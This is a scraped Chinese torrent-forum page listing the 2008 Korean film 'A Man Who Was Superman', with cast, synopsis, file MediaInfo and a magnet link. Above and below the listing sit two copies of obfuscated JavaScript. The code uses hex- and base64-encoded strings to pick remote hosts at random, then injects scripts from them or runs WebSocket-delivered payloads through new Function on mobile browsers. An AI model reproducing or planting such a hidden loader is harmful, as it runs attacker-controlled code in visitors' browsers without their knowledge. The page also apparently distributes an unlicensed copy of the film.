曾是超人的男子[中文字幕].A.Man.Who.Was.Superman.2008.1080p.WEB-DL.H265.AAC 6.31GB

版主小s 1月前 613

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 曾是超人的男子 / A Man Who Was Superman / 超人男 / 曾经是超人的男人 / 我的超人男友

◎片 名 ?????? ???

◎年 代 2008

◎产 地 韩国

◎类 别 剧情 / 喜剧

◎语 言 韩语

◎上映日期 2008-01-31(韩国)

◎IMDb链接 https://www.imdb.com/title/tt1119199/

◎豆瓣评分 7.4/10 (11136人评价)

◎豆瓣链接 https://movie.douban.com/subject/2970163/

◎片 长 102分钟

◎导 演 郑胤澈 Yoon-chul Jeong (id:1321759)

◎编 剧 郑胤澈 Yoon-chul Jeong (id:1321759)

◎演 员 黄政民 Jeong-min Hwang (id:1051046)

全智贤 Gianna Jun (id:1035649)

陈智熙 Ji-hee Jin (id:1275681)

李相烨 Sang-Yeob Lee (id:1319238)

鲜于善 Woo-seon Seon (id:1324380)

姜爱信 Ae-shim Kang (id:1438051)

朴镇宇 Park Jin-woo (id:1376719)

朴贤英 Hyun-young Park (id:1428246)

朴贵顺 Kwi-soon Park (id:1389470)

徐永嬅 Young-hwa Seo (id:1349844)

伍基洪 Ki-Hong Woo (id:1329943)

朴惠珍 Hye-jin Park (id:1456991)

崔永桓 Yeong-hwan Choi (id:1280703)

李庸基 Yong-Gi Lee (id:1314650)

◎标 签 全智贤 / 韩国 / 韩国电影 / 黄政民 / 曾是超人的男子 / 剧情 / 2008 / 好戏推荐

◎简 介

宋秀晶(全智贤 饰)三年来不断面对虚伪的感动拍摄记录片,此刻她想要拍真实的非洲狮子。感到厌倦不已的她拿走了公司的摄影机代替自己的工资,决心要开办小型的制片公司。但发展所需的材料令她困扰极了,拍摄日子在即,她的摄影机眼看就被小偷抢走了。危急之际,一个穿着夏威夷衬衫的男人(黄政民 饰)帮她从小偷手上抢回了摄影机。

这个男人自称自己是超人,更摆出各样奇怪的超人姿势。秀晶灵机一动,决定跟随他拍摄“拯救地球”的记录。

这段影片很快便曝光了,而且得到了极高的关注率。可是在告捷会后,这个傻傻的超人竟然说要揭开记录片里的伪造之处。因此意外摔伤了头部的超人,被医生发现了脑中又异样的东西。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 147473963885729755833928004987744636977 (0x6EF273CA5BDD05565E1853D81B935031)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.31 GiB

  8. Duration : 1 h 45 min

  9. Overall bit rate : 8 547 kb/s

  10. Encoded date : UTC 2021-11-02 12:35:18

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : [email protected]@Main

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 45 min

  20. Bit rate : 8 354 kb/s

  21. Width : 1 920 pixels

  22. Height : 1 040 pixels

  23. Display aspect ratio : 1.85:1

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 8 bits

  29. Bits/(Pixel*Frame) : 0.174

  30. Stream size : 6.17 GiB (98%)

  31. Default : Yes

  32. Forced : No


  33. Audio

  34. ID : 2

  35. Format : AAC LC

  36. Format/Info : Advanced Audio Codec Low Complexity

  37. Codec ID : A_AAC-2

  38. Duration : 1 h 45 min

  39. Bit rate : 192 kb/s

  40. Channel(s) : 2 channels

  41. Channel layout : L R

  42. Sampling rate : 44.1 kHz

  43. Frame rate : 43.066 FPS (1024 SPF)

  44. Compression mode : Lossy

  45. Stream size : 144 MiB (2%)

  46. Language : Korean

  47. Default : Yes

  48. Forced : No


  49. Text #1

  50. ID : 3

  51. Format : UTF-8

  52. Codec ID : S_TEXT/UTF8

  53. Codec ID/Info : UTF-8 Plain Text

  54. Duration : 1 h 41 min

  55. Bit rate : 33 b/s

  56. Count of elements : 972

  57. Stream size : 25.0 KiB (0%)

  58. Title : Chinese Simplified

  59. Language : Chinese

  60. Default : Yes

  61. Forced : No


  62. Text #2

  63. ID : 4

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 41 min

  68. Bit rate : 33 b/s

  69. Count of elements : 972

  70. Stream size : 25.0 KiB (0%)

  71. Title : Chinese Traditional

  72. Language : Chinese

  73. Default : No

  74. Forced : No


  75. Text #3

  76. ID : 5

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 1 h 41 min

  81. Bit rate : 27 b/s

  82. Count of elements : 778

  83. Stream size : 20.8 KiB (0%)

  84. Title : English

  85. Language : English

  86. Default : No

  87. Forced : No




复制代码


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:7B5ABBD028CC67B810AAAD2CE356C95B8B552CDB

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};